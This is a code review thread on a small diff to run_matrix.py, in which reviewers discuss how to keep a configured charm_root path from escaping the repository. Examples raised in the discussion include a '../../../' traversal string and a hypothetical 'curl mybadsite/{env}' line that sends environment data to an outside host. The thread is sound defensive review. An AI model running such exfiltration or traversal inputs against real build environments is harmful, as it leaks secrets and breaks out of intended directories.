run_matrix.py

```diff
@@ -91,7 +91,7 @@ def _prepare_repo(
 
     # multi-charm repos might have multiple charms in a single repo.
     if charm_root_cfg := charm_config.test_setup.get("charm_root"):
-        charm_root_path = repo_root_path.joinpath(*charm_root_cfg.split("/"))
+        charm_root_path = repo_root_path.joinpath(*charm_root_cfg.split(os.path.sep))
```

Comment:
Actually, consider using this approach instead: https://chat.canonical.com/canonical/pl/p7cym3w5pp8988a5u3b3hae4ba

Reply:
or, there's `os.path.split(str)` as a shortcut for `str.split(os.path.sep)`

Reply:
`os.path.split(str)` is more `str.rsplit(os.path.sep, 1)` (which I think is bad API design on the stdlib side).

The `relative_to("/")` approach probably is best I guess? The intention here is to prevent people from escaping out of the `repo_root_path`, yes?

Reply:
precisely, yes. I guess we could be guarding against `"../../../"` too?

Reply:
but I hope this would be caught in a PR review stage since all needs to be committed to this repo

Reply:
Yeah - I was also a bit nervous about adding a "run any command you like" option (rather than e.g. specific actions like copying a file or running tox or uv), since you can then do `curl mybadsite/{env}` or whatever. But we're already letting people run arbitrary Python code, so ...

I think we should try to avoid people making mistakes like putting in an absolute path, but we need to assume that the environment is unsafe, and lean on code review. Maybe in the future tests should run in separate VMs?